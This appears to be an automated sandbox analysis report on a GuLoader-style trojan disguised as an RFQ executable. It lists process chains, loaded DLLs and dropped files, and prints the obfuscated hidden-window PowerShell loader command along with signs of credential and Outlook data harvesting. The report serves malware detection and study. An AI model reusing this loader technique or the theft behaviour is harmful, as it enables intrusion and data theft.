File created: C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Code function: 19_2_0344F298 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,

19_2_0344F298

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034FC

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Code function: 0_2_00406C3F	0_2_00406C3F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_02DEF3F8	1_2_02DEF3F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_02DEF0B0	1_2_02DEF0B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_072ACDB8	1_2_072ACDB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08180040	1_2_08180040

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: userenv.dll	Jump to behavior

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@36/14@3/3

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

0_2_004034FC

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Code function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404991

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

File created: C:\Program Files (x86)\Common Files\ukases.lnk

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

File created: C:\Users\user\AppData\Local\Ubarberet

Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1104:120:WilError_03

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

File created: C:\Users\user\AppData\Local\Temp\nssF0FE.tmp

Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Command line argument: WindowHandle

19_2_002F1C27

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ImagingDevices.exe, 00000013.00000003.1919840040.0000000002E35000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Virustotal: Detection: 9%

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

File read: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: ukases.lnk.0.dr

LNK file: ..\..\Users\user\Documents\komplement.epi

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ImagingDevices.pdb source: ImagingDevices.exe, ImagingDevices.exe, 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.1926714134.00000000084CA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55 source: powershell.exe, 00000001.00000002.1919713702.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ImagingDevices.pdbGCTL source: ImagingDevices.exe, 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1923493560.00000000071C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923493560.0000000007228000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.1926270100.0000000008410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1923493560.00000000071C6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000001.00000002.1923493560.00000000071C1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000001.00000002.1923493560.0000000007228000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: ImagingDevices.exe PID: 7560, type: MEMORYSTR
Source: Yara match	File source: 00000001.00000002.1926920759.0000000008EBA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)"
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)"			Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Code function: 19_2_002F1BA9 LoadLibraryW,GetProcAddress,GetDesktopWindow,GetLastError,FreeLibrary,GetLastError,

19_2_002F1BA9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08185D97 pushfd ; ret	1_2_08185DA1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0818429B push ebx; ret	1_2_081842DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D91EFC push ss; retf	1_2_08D91EFB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D91EE5 push ss; retf	1_2_08D91EFB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D91E01 push ebp; ret	1_2_08D91E09
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D90405 push es; iretd	1_2_08D90407
